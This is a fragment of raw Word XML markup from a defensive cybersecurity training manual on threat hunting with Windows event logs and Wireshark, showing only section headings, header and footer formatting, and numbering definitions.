        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Identify artifacts in windows event logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134CC14C" w14:textId="77777777" w:rsidR="00F32801" w:rsidRPr="00F32801" w:rsidRDefault="00F32801" w:rsidP="00F32801"/>
    <w:p w14:paraId="6C99F3F1" w14:textId="71E98E6D" w:rsidR="005E0DCD" w:rsidRDefault="00F32801" w:rsidP="00BB2BC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Analyze collected artifacts to identify malicious activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F435936" w14:textId="77777777" w:rsidR="00F32801" w:rsidRDefault="00F32801" w:rsidP="00F32801"/>
    <w:p w14:paraId="377ABAAC" w14:textId="77AB2766" w:rsidR="00F32801" w:rsidRPr="00F32801" w:rsidRDefault="00F32801" w:rsidP="00AD7E69">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>investigate network traffic using wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F8881C" w14:textId="77777777" w:rsidR="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="005E0DCD"/>
    <w:p w14:paraId="2A9D3F44" w14:textId="77777777" w:rsidR="005E0DCD" w:rsidRPr="005E0DCD" w:rsidRDefault="005E0DCD" w:rsidP="005E0DCD"/>
    <w:sectPr w:rsidR="005E0DCD" w:rsidRPr="005E0DCD" w:rsidSect="00E462B9">
      <w:headerReference w:type="default" r:id="rId20"/>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3DA0" w14:textId="77777777" w:rsidR="0090384C" w:rsidRDefault="0090384C" w:rsidP="00A17629">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0BC1C3C0" w14:textId="77777777" w:rsidR="0090384C" w:rsidRDefault="0090384C" w:rsidP="00A176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3597"/>
      <w:gridCol w:w="3597"/>
    </w:tblGrid>
    <w:tr w:rsidR="003B12C7" w14:paraId="4279FCF6" w14:textId="77777777" w:rsidTr="00991A38">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3776" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="68D133"/>
        </w:tcPr>
        <w:p w14:paraId="1BD7F444" w14:textId="087A7B16" w:rsidR="003B12C7" w:rsidRPr="00F90A24" w:rsidRDefault="003B12C7" w:rsidP="009736B5">
          <w:pPr>
            <w:pStyle w:val="Footer"/>
            <w:spacing w:before="120" w:after="240"/>
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>32 WPS/DOA</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3597" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="68D133"/>
        </w:tcPr>
        <w:p w14:paraId="46C286D4" w14:textId="658B2D60" w:rsidR="003B12C7" w:rsidRPr="00F90A24" w:rsidRDefault="005273F1" w:rsidP="00991A38">
          <w:pPr>
            <w:pStyle w:val="NoSpacing"/>
            <w:spacing w:before="120" w:after="240"/>
            <w:ind w:left="144" w:right="144"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>7</w:t>
          </w:r>
          <w:r w:rsidR="003B12C7">
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>/</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
          <w:r w:rsidR="003B12C7">
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>3</w:t>
          </w:r>
          <w:r w:rsidR="003B12C7" w:rsidRPr="00F90A24">
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>/2</w:t>
          </w:r>
          <w:r w:rsidR="00015E89">
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>3</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3597" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="68D133"/>
        </w:tcPr>
        <w:p w14:paraId="2FBB60B6" w14:textId="1A3C95B6" w:rsidR="003B12C7" w:rsidRPr="00F90A24" w:rsidRDefault="003B12C7" w:rsidP="009736B5">
          <w:pPr>
            <w:pStyle w:val="Footer"/>
            <w:spacing w:before="120" w:after="240"/>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:t xml:space="preserve">Page </w:t>
          </w:r>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> PAGE  \* Arabic  \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00527357">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:t>10</w:t>
          </w:r>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:t xml:space="preserve"> of </w:t>
          </w:r>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> NUMPAGES  \* Arabic  \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00527357">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:t>34</w:t>
          </w:r>
          <w:r w:rsidRPr="00F90A24">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="655DC69F" w14:textId="77777777" w:rsidR="003B12C7" w:rsidRDefault="003B1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A76A" w14:textId="77777777" w:rsidR="0090384C" w:rsidRDefault="0090384C" w:rsidP="00A17629">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A96B767" w14:textId="77777777" w:rsidR="0090384C" w:rsidRDefault="0090384C" w:rsidP="00A176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0A5"/>
      <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="11160"/>
    </w:tblGrid>
    <w:tr w:rsidR="003B12C7" w14:paraId="5EF35ABC" w14:textId="77777777" w:rsidTr="00991A38">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="11160" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="5F80A5"/>
        </w:tcPr>
        <w:p w14:paraId="7E3F56D6" w14:textId="67102682" w:rsidR="003B12C7" w:rsidRPr="00F90A24" w:rsidRDefault="003B12C7" w:rsidP="00991A38">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:spacing w:before="120" w:after="240"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t xml:space="preserve">Weapon System Training – 2: Threat Hunting with Event </w:t>
          </w:r>
          <w:r w:rsidR="005273F1">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>Logs and Wireshark</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="5EE76EEB" w14:textId="77777777" w:rsidR="003B12C7" w:rsidRDefault="003B1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08D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="865A90E2"/>
    <w:lvl w:ilvl="0" w:tplc="EDC8C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7DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C18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B6265"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5B80424"/>
    <w:lvl w:ilvl="0" w:tplc="3C2E10B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FC5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158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590CA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="224E8B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6E4DA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB1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B2809"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10A29E6C"/>
    <w:lvl w:ilvl="0" w:tplc="FB2A1884">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Step %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F75E7484">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4EDA9416">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9FB8DE6E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C29EACB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5D586718">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6884FBC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7804BCCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="473C2F3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11F766B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDEE2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130659"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12C6917A"/>
    <w:lvl w:ilvl="0" w:tplc="CDDCF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677C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6180EB26"/>
    <w:lvl w:ilvl="0" w:tplc="BFE2DE6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Step %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A3806"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="157C8AF0"/>
    <w:lvl w:ilvl="0" w:tplc="D584C9B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A5006"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C8049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AE92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7157D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EC8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02E0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE002F7A"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Step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35B1916"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F4A4E52"/>
    <w:lvl w:ilvl="0" w:tplc="774CFC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31039"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A785A58"/>
    <w:lvl w:ilvl="0" w:tplc="27A08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C22A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7FB4AACA"/>
    <w:lvl w:ilvl="0" w:tplc="534E3598">
      <w:start w:val="46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AB067D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5ECF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F3A71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66AC4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011093"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAAA0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56D3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30300890"/>
    <w:lvl w:ilvl="0" w:tplc="FEAE1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B4BE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5026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2B5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200CFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="857EB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96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D1B6377"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50E27D3E"/>
    <w:lvl w:ilvl="0" w:tplc="D584C9B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3C4554"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D34E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BC1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15F2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4595C5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE002F7A"/>
    <w:lvl w:ilvl="0" w:tplc="BFE2DE6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614499"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC5A69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E87AFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85B0217C"/>
    <w:lvl w:ilvl="0" w:tplc="269EBDB8">
      <w:start w:val="10"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="269EBDB8">
      <w:start w:val="10"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="269EBDB8">
      <w:start w:val="10"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorEastAsia"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8D42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7B00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04F38EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AA83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B760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F574D80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19505712"/>
    <w:lvl w:ilvl="0" w:tplc="4DDE9AB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DA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F61E8720"/>
    <w:lvl w:ilvl="0" w:tplc="EBBE8B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A60334"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42701074"/>
    <w:lvl w:ilvl="0" w:tplc="1728C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93025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433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5AA09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686B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9D77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80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9A2545"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC5E7DA8"/>
    <w:lvl w:ilvl="0" w:tplc="104CB262">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0FBCE0D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="673011EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3C587216">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="155A840E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="89D65D6E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B48CDC26">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="219CC174">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="255A5936">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="730159488">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="547179961">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="85611964">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="737241212">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="498424598">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1630555045">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="358169828">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="259529741">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="859199746">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1363364830">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="312761135">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1255170381">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1060665062">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1419982911">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1207643365">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="416748480">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1327828874">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="858198220">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="358168836">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="217598057">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="616522718">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1230309783">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="17197942">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1996570704">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1167748265">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="88045980">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="262343556">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="2014606302">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1167751751">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="853156047">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="331373180">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="558826700">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1636521099">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="310603477">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1597443285">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1486243193">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1400322344">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="57363031">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="288390998">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="731849756">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1145929003">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1989020085">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="882983104">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="911087972">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="588736212">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1658611645">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1556699036">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="9949886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71F515"/>
    <w:rsid w:val="00006D05"/>
    <w:rsid w:val="0001008E"/>
    <w:rsid w:val="0001240D"/>
    <w:rsid w:val="0001250D"/>
    <w:rsid w:val="0001464C"/>
    <w:rsid w:val="00015E89"/>
    <w:rsid w:val="00016B1F"/>
    <w:rsid w:val="000253B0"/>
    <w:rsid w:val="00026872"/>
    <w:rsid w:val="000340D4"/>
    <w:rsid w:val="000341A5"/>
    <w:rsid w:val="0004722B"/>
    <w:rsid w:val="00047958"/>
    <w:rsid w:val="00054ECE"/>
    <w:rsid w:val="00056736"/>
    <w:rsid w:val="00057982"/>
    <w:rsid w:val="000610C0"/>
    <w:rsid w:val="00065E7C"/>
    <w:rsid w:val="000672FF"/>
    <w:rsid w:val="00080A1B"/>
    <w:rsid w:val="00093377"/>
    <w:rsid w:val="0009749D"/>
    <w:rsid w:val="000A4D20"/>
    <w:rsid w:val="000A6F5A"/>
    <w:rsid w:val="000B155C"/>
    <w:rsid w:val="000B2A93"/>
    <w:rsid w:val="000C1E52"/>
    <w:rsid w:val="000C4009"/>
